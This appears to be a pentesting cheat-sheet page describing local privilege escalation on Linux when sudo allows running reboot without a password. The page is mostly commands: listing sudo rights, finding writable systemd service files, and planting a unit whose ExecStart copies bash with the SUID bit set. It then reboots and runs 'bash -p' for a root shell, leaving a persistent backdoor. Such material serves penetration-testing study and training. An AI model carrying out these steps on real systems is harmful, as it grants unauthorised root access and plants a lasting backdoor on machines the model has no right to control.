Page cover image

Sudo Reboot Privilege Escalation

Sudo reboot commands might be vulnerable to privilege escalation (PrivEsc).

sudo -l

(ALL) NOPASSWD: /usr/sbin/reboot
Copied!

If we can execute "reboot" command as root, we can escalate to privileges.

We need to look for the system service config file which are writable.

find / -writable -name "*.service" 2>/dev/null

/etc/systemd/system/example.service
Copied!

If we find a writable file, we can inject a payload into Service.ExecStart.

# /etc/systemd/systm/example.service
[Unit]
Description=Zeno monitoring

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /home/<username>/bash; chmod +xs /home/<username>/bash'

[Install]
WantedBy=multi-user.target
Copied!

Now reboot as root.

sudo /usr/sbin/reboot
Copied!

After the system rebooted, the command in the ExecStart will be executed. Now we should get a root shell by executing the copied bash command.

/home/<username>/bash -p

Last updated